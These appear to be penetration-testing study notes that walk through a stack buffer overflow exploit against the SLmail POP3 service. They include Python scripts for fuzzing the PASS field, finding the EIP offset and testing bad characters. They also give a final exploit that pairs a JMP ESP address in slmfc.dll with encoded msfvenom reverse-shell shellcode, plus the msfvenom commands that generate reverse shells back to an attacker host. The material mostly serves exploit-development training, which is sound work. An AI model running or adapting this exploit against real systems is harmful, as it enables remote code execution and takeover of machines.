Links, exploits
Example: SLmail
Check the approximate buffer length by sending A's in steps of about 200 bytes
#!/usr/bin/python
# Python 2 script (print statement, str == bytes); it does not run under Python 3.
import socket

# Create an array of buffers, from 1 to 5900, with increments of 200.
# Result: "A", then "A"*100, "A"*300, ... up to "A"*5900 (31 entries).
# NOTE: `buffer` shadows the Python 2 builtin of the same name (harmless here).
buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

# One fresh connection per length; the length is printed *before* it is sent,
# so the last line on the console is the length at which the service stopped
# answering. No socket timeout is set, so once the service is down the recv()
# below blocks indefinitely (the sample output below ends at 2900 for that reason).
for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('<ip>',110))    # '<ip>' is a placeholder for the target host; POP3 port
    s.recv(1024)                       # server banner, discarded
    s.send('USER test\r\n')
    s.recv(1024)                       # USER response, discarded
    s.send('PASS ' + string + '\r\n')  # the oversized PASS argument is what is being fuzzed
    s.send('QUIT\r\n')
    s.close()
python 01_CheckApproxBufferLength.py
Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes
Check exact buffer length
Create a unique (non-repeating) buffer of the last working length (2700)
msf-pattern_create -l 2700
Alternative:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#!/usr/bin/python
# Python 2 script (print statement, str == bytes); it does not run under Python 3.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 2700-byte cyclic pattern from msf-pattern_create -l 2700 (single string literal;
# the page wrapped it mid-token). Its substrings are unique, so whatever 4 bytes
# end up in EIP identify their position in the buffer (msf-pattern_offset, next step).
buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9'
try:
    print "\nSending evil buffer..."
    s.connect(('<ip>',110))            # '<ip>' is a placeholder for the target host; POP3 port
    data = s.recv(1024)                # banner; read to keep the dialogue in step, never inspected
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                # USER response, never inspected
    s.send('PASS ' + buffer + '\r\n')  # same field the fuzzing step above crashed
    print "\nDone!."
except:
    # Bare except: catches everything, including KeyboardInterrupt, and prints
    # the same message for any failure, not only a refused connection.
    # NOTE(review): the socket is never closed on either path of this script.
    print "Could not connect to POP3!"
msf-pattern_offset -l 2700 -q 39694438
Alternative:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
[*] Exact match at offset 2606
-> buffer = "A"*2606 + "B"*4 + "C"*90
Increase buffer
Shellcode needs around 350-400 bytes
# 3500-byte crash buffer: 2606 A's up to EIP, 4 B's landing in EIP, a 4-byte
# gap of C's, and D's filling the remaining 886 bytes (3500 - 2606 - 4 - 4).
buffer = "".join(["A" * 2606, "B" * 4, "C" * 4, "D" * (3500 - 2606 - 4 - 4)])
-> Verify that the app still crashes in a similar way, and check the length of the D's
Target: EIP -> B's, ESP -> D's (or ECX?)
TODO: Write this in a nicer way, like:
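# Same 3500-byte crash buffer as above, built from named parts so the layout
# (filler | EIP overwrite | 4-byte gap | shellcode area) is explicit.
# Fixes vs. the draft: the shellcode line was missing its closing parenthesis
# and the final line misspelled `filler` as `fillter`.
filler = "A" * 2606      # bytes before the EIP overwrite (offset 2606 from msf-pattern_offset)
eip = "B" * 4            # the 4 bytes that land in EIP
offset = "C" * 4         # 4-byte gap between EIP and where ESP points (D's)
shellcode = "D" * (3500 - len(filler) - len(eip) - len(offset))  # fills the rest of the 3500 bytes
buffer = filler + eip + offset + shellcode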
#!/usr/bin/python
# Python 2 script (print statement, str == bytes); it does not run under Python 3.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# All byte values 0x01..0xff in order; \x00 is left out from the start (presumably
# as a C-string terminator). The string is sent in place of the D's, then compared
# against the memory dump (steps below): the byte after the last one that arrived
# intact is a bad char, is removed from this list, and the run is repeated.
# The later msfvenom command excludes \x00\x0a\x0d, i.e. \x0a and \x0d are the
# bad chars found this way, and this list still contains them.
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# 2606 bytes of filler + 4 bytes over EIP, then the candidate bytes where the
# shellcode will later go.
buffer="A"*2606 + "B"*4 + badchars
try:
    print "\nSending evil buffer..."
    s.connect(('<ip>',110))            # '<ip>' is a placeholder for the target host; POP3 port
    data = s.recv(1024)                # banner; read to keep the dialogue in step, never inspected
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                # USER response, never inspected
    s.send('PASS ' + buffer + '\r\n')
    s.close()
    print "\nDone!"
except:
    # Bare except: catches everything, including KeyboardInterrupt, and prints
    # the same message for any failure, not only a refused connection.
    print "Could not connect to POP3!"
1. Check where all the A's are?
2. Right click ECX -> Follow in Dump
3. Check which char is the last one displayed from our sequence of ASCII chars
-> remove this char from the sequence and run it again until there are no more bad chars
Find a JMP ESP instruction
-> look for a module without any buffer-overflow protections in place (like DEP or ASLR)
Find the JMP ESP instruction in the module
!mona find -s "\xff\xe4" -m "slmfc.dll"
Reverse the bytes (due to little-endianness)
-> \x8f\x35\x4a\x5f
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1337 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
#!/usr/bin/python
# Python 2 script (print statement, str == bytes); it does not run under Python 3.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Output of the msfvenom command above (windows/shell_reverse_tcp, shikata_ga_nai
# encoded, \x00\x0a\x0d excluded). The bytes embed whatever LHOST/LPORT was used
# when it was generated, so it has to be regenerated rather than reused.
shellcode = ("\xbf\x41\xa7\x91\x24\xda\xc0\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x7a\x12\x03\x7a\x12\x83\xab\x5b\x73\xd1\xd7\x4c\xf6"
"\x1a\x27\x8d\x97\x93\xc2\xbc\x97\xc0\x87\xef\x27\x82\xc5\x03"
"\xc3\xc6\xfd\x90\xa1\xce\xf2\x11\x0f\x29\x3d\xa1\x3c\x09\x5c"
"\x21\x3f\x5e\xbe\x18\xf0\x93\xbf\x5d\xed\x5e\xed\x36\x79\xcc"
"\x01\x32\x37\xcd\xaa\x08\xd9\x55\x4f\xd8\xd8\x74\xde\x52\x83"
"\x56\xe1\xb7\xbf\xde\xf9\xd4\xfa\xa9\x72\x2e\x70\x28\x52\x7e"
"\x79\x87\x9b\x4e\x88\xd9\xdc\x69\x73\xac\x14\x8a\x0e\xb7\xe3"
"\xf0\xd4\x32\xf7\x53\x9e\xe5\xd3\x62\x73\x73\x90\x69\x38\xf7"
"\xfe\x6d\xbf\xd4\x75\x89\x34\xdb\x59\x1b\x0e\xf8\x7d\x47\xd4"
"\x61\x24\x2d\xbb\x9e\x36\x8e\x64\x3b\x3d\x23\x70\x36\x1c\x2c"
"\xb5\x7b\x9e\xac\xd1\x0c\xed\x9e\x7e\xa7\x79\x93\xf7\x61\x7e"
"\xd4\x2d\xd5\x10\x2b\xce\x26\x39\xe8\x9a\x76\x51\xd9\xa2\x1c"
"\xa1\xe6\x76\xb2\xf1\x48\x29\x73\xa1\x28\x99\x1b\xab\xa6\xc6"
"\x3c\xd4\x6c\x6f\xd6\x2f\xe7\x9a\xf4\x18\xf2\xf2\xf8\x66\xf9"
"\x3b\x74\x80\x6b\x2c\xd0\x1b\x04\xd5\x79\xd7\xb5\x1a\x54\x92"
"\xf6\x91\x5b\x63\xb8\x51\x11\x77\x2d\x92\x6c\x25\xf8\xad\x5a"
"\x41\x66\x3f\x01\x91\xe1\x5c\x9e\xc6\xa6\x93\xd7\x82\x5a\x8d"
"\x41\xb0\xa6\x4b\xa9\x70\x7d\xa8\x34\x79\xf0\x94\x12\x69\xcc"
"\x15\x1f\xdd\x80\x43\xc9\x8b\x66\x3a\xbb\x65\x31\x91\x15\xe1"
"\xc4\xd9\xa5\x77\xc9\x37\x50\x97\x78\xee\x25\xa8\xb5\x66\xa2"
"\xd1\xab\x16\x4d\x08\x68\x26\x04\x10\xd9\xaf\xc1\xc1\x5b\xb2"
"\xf1\x3c\x9f\xcb\x71\xb4\x60\x28\x69\xbd\x65\x74\x2d\x2e\x14"
"\xe5\xd8\x50\x8b\x06\xc9")
# offset + JMP ESP address + nop padding + shellcode
# 2606 A's reach the EIP overwrite (msf-pattern_offset result above);
# "\x8f\x35\x4a\x5f" is the little-endian form of the JMP ESP address found
# in slmfc.dll (0x5f4a358f, see the mona step above), so execution continues
# at ESP; 16 NOP bytes (0x90) pad the gap before the shellcode.
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90"*16 + shellcode
try:
    print "\nSending evil buffer..."
    s.connect(('<ip>',110))            # '<ip>' is a placeholder for the target host; POP3 port
    data = s.recv(1024)                # banner; read to keep the dialogue in step, never inspected
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                # USER response, never inspected
    s.send('PASS ' + buffer + '\r\n')
    s.close()
    print "\nDone!"
except:
    # Bare except: catches everything, including KeyboardInterrupt, and prints
    # the same message for any failure, not only a refused connection.
    print "Could not connect to POP3!"
Additional stuff and improvements
Locating space for shellcode
Need about 350-400 bytes
-> increase buffer (if needed)
Find opcode
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
jmp esp
-> FFE4
Improving the exploit
Use EXITFUNC=thread so that only the affected thread is terminated, not the whole process
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Troubleshooting
Run Immunity Debugger as Administrator
Restart Immunity Debugger after each "crash"
Don't forget to hit "Run" (attaching puts the process in the Paused state)
Always attach Immunity Debugger: somehow SLMail did not crash during the first stage (finding the approximate buffer length) without it 0_o
Make sure the JMP ESP address contains no bad chars